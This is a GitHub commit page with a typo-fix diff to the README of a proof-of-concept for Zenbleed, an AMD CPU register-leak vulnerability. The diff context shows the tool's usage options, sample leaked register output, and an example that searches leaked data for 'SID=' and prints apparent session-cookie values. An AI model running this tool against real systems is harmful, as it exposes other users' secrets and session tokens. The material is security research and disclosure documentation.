Skip to content

Commit

Permalink
pocs/cpus/zenbleed: Update README.md (#42)
Browse files Browse the repository at this point in the history
Bunch of typos.... zenbleed/zenleak
  • Loading branch information
ntnlabs authored Oct 27, 2023
1 parent ef9ff5a commit 0b9836d
Showing 1 changed file with 3 additions and 3 deletions.
6 changes: 3 additions & 3 deletions pocs/cpus/zenbleed/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -90,7 +90,7 @@ ZenBleed Testcase -- [email protected]
NOTE: Try -h to see configuration options
Usage: ./zenleak [OPTIONS]
Usage: ./zenbleed [OPTIONS]
-v N Select a variant leak kernel, different kernels work better on different SKUs.
-m N Stop after leaking N values, useful for benchmarking.
-H N Spawn a 'hammer' thread on core N, produces recognizable values for testing.
Expand All @@ -112,7 +112,7 @@ For example, a command like `while true; do sort < /etc/passwd > /dev/null; done
This should generate some recognizable register throughput, like this:

```
$ ./zenleak
$ ./zenbleed
Thread 0x7f26b92346c0 running on CPU 0
Thread 0x7f26b8a336c0 running on CPU 2
Thread 12: "999:999:systemd "
Expand Down Expand Up @@ -169,7 +169,7 @@ registers for a string that looks like that. As it learns more of the string
that follows, it will extend the search to continue the pattern.

```
$ ./zenleak -q -p "SID="
$ ./zenbleed -q -p "SID="
SID=cieX4meceechoo2UThooh5uu; 1P_JAR=2023-05-17-21; S^C
```

Expand Down

0 comments on commit 0b9836d

Please sign in to comment.